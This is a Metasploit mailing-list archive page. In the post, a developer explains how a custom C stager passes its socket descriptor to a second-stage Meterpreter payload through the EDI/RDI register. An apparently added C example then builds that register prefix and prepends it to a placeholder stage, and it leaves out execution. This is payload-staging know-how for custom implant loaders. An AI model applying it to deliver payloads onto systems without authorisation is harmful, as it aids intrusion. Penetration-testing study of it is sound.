Metasploit mailing list archives
Re: inline meterpreter payload
From: Michael Schierl <schierlm () gmx de>
Date: Wed, 12 Sep 2012 18:07:45 +0200
[resent message as I was subscribed with the wrong email address]

On 12.09.2012 01:37, Stephen Haywood wrote:
> I've got a C program that does exactly that but have never been able to get it to connect back to Metasploit after the second stage is executed.
Assuming this is for X86 arch, you have to make sure that the EDI register contains your socket descriptor (the value of the ConnectSocket variable). You can do this via inline asm, but it might be easier to just prepend the 5 bytes for setting it to your shellcode:

    BF 78 56 34 12                  mov edi, 0x12345678

For 64 bit, you have to use the RDI register (and need 10 bytes):

    48 BF 78 56 34 12 00 00 00 00   mov rdi, 0x12345678

Hope this helps,

Michael

PS: This is the reason why the calling convention within Metasploit is called "sockedi" :-)

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
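The prefix Michael describes, as an added worked example (this is not code from the thread or from the Metasploit project): two small encoders emit the `mov edi, imm32` / `mov rdi, imm64` bytes for a given socket descriptor, and a glue routine puts that prefix in front of the received stage so the stage finds its socket in EDI/RDI. The socket value 0x12345678 and the two-byte stage placeholder are constructed for the demo; a real stager would use its `ConnectSocket` and the stage bytes read from the handler, and would copy the finished buffer into executable memory, a step this example deliberately does not take. On Windows a SOCKET is pointer-sized, which is why the x64 variant encodes the full 64-bit value.

```c
/* sockedi_prefix.c - build the register-setting prefix for a stage that
 * follows Metasploit's "sockedi" convention (socket descriptor in EDI/RDI).
 * Added example for this archive page; not code from the thread or from Metasploit.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* mov edi, imm32: opcode 0xBF followed by the little-endian immediate (5 bytes). */
size_t build_sockedi_prefix32(uint32_t fd, uint8_t *out)
{
    out[0] = 0xBF;
    for (int i = 0; i < 4; i++)
        out[1 + i] = (uint8_t)(fd >> (8 * i));
    return 5;
}

/* REX.W + mov rdi, imm64: 48 BF followed by the little-endian 64-bit immediate
 * (10 bytes). A Windows SOCKET is pointer-sized, so the whole value is encoded. */
size_t build_sockedi_prefix64(uint64_t fd, uint8_t *out)
{
    out[0] = 0x48;
    out[1] = 0xBF;
    for (int i = 0; i < 8; i++)
        out[2 + i] = (uint8_t)(fd >> (8 * i));
    return 10;
}

/* Prefix + stage into one buffer. Returns the total length, or 0 if out is too small. */
size_t prepend_sockedi(int x64, uint64_t fd,
                       const uint8_t *stage, size_t stage_len,
                       uint8_t *out, size_t out_cap)
{
    uint8_t prefix[10];
    size_t plen = x64 ? build_sockedi_prefix64(fd, prefix)
                      : build_sockedi_prefix32((uint32_t)fd, prefix);
    if (out_cap < plen + stage_len)
        return 0;
    memcpy(out, prefix, plen);
    memcpy(out + plen, stage, stage_len);
    return plen + stage_len;
}

/* Check the encoders against the byte sequences quoted in the message above.
 * Returns 1 when both match. */
int selftest(void)
{
    static const uint8_t want32[5]  = { 0xBF, 0x78, 0x56, 0x34, 0x12 };
    static const uint8_t want64[10] = { 0x48, 0xBF, 0x78, 0x56, 0x34, 0x12, 0, 0, 0, 0 };
    uint8_t buf[16];
    if (build_sockedi_prefix32(0x12345678u, buf) != 5 || memcmp(buf, want32, 5) != 0)
        return 0;
    if (build_sockedi_prefix64(0x12345678ull, buf) != 10 || memcmp(buf, want64, 10) != 0)
        return 0;
    return 1;
}

int main(void)
{
    /* Constructed placeholder standing in for the stage read from the handler
     * (a real stager recv()s the 4-byte length and then that many stage bytes). */
    const uint8_t stage[] = { 0xCC, 0xC3 };
    uint8_t shellcode[64];
    uint64_t connect_socket = 0x12345678;   /* assumed value of ConnectSocket */

    size_t n = prepend_sockedi(0, connect_socket, stage, sizeof stage,
                               shellcode, sizeof shellcode);
    printf("x86 buffer (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02X", shellcode[i]);
    printf("\n");

    n = prepend_sockedi(1, connect_socket, stage, sizeof stage,
                        shellcode, sizeof shellcode);
    printf("x64 buffer (%zu bytes):", n);
    for (size_t i = 0; i < n; i++) printf(" %02X", shellcode[i]);
    printf("\n");

    /* The finished buffer would be copied into executable memory (VirtualAlloc
     * on Windows, mmap on Linux) and called; that step is intentionally omitted. */
    return selftest() ? 0 : 1;
}
```

The x86 buffer printed for the constructed input is BF 78 56 34 12 CC C3: the five-byte prefix followed by the stage, exactly the layout the message describes. Note that the socket value must be patched in at runtime, after `connect()` returns, not compiled in as a constant.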
Current thread:
- Re: inline meterpreter payload, (continued)
- Re: inline meterpreter payload Sherif El-Deeb (Sep 07)
- Re: inline meterpreter payload Richard Miles (Sep 11)
- Re: inline meterpreter payload Joshua Smith (Sep 11)
- Re: inline meterpreter payload Richard Miles (Sep 11)
- Re: inline meterpreter payload egypt (Sep 11)
- Re: inline meterpreter payload Chip (Sep 11)
- Re: inline meterpreter payload egypt (Sep 11)
- Re: inline meterpreter payload Joshua Smith (Sep 11)
- Re: inline meterpreter payload Stephen Haywood (Sep 11)
- Re: inline meterpreter payload Stephen Haywood (Sep 11)
- Re: inline meterpreter payload Michael Schierl (Sep 12)
- Re: inline meterpreter payload Joshua Smith (Sep 12)
- Re: inline meterpreter payload Richard Miles (Sep 11)
- Re: inline meterpreter payload Richard Miles (Sep 12)
- Re: inline meterpreter payload egypt (Sep 12)
- Re: inline meterpreter payload Sherif El-Deeb (Sep 07)
- Re: inline meterpreter payload Jonathan Cran (Sep 11)
- Re: inline meterpreter payload Joshua Smith (Sep 11)
- Re: inline meterpreter payload Richard Miles (Sep 13)
- Re: inline meterpreter payload Sherif El-Deeb (Sep 13)
- Re: inline meterpreter payload Richard Miles (Sep 14)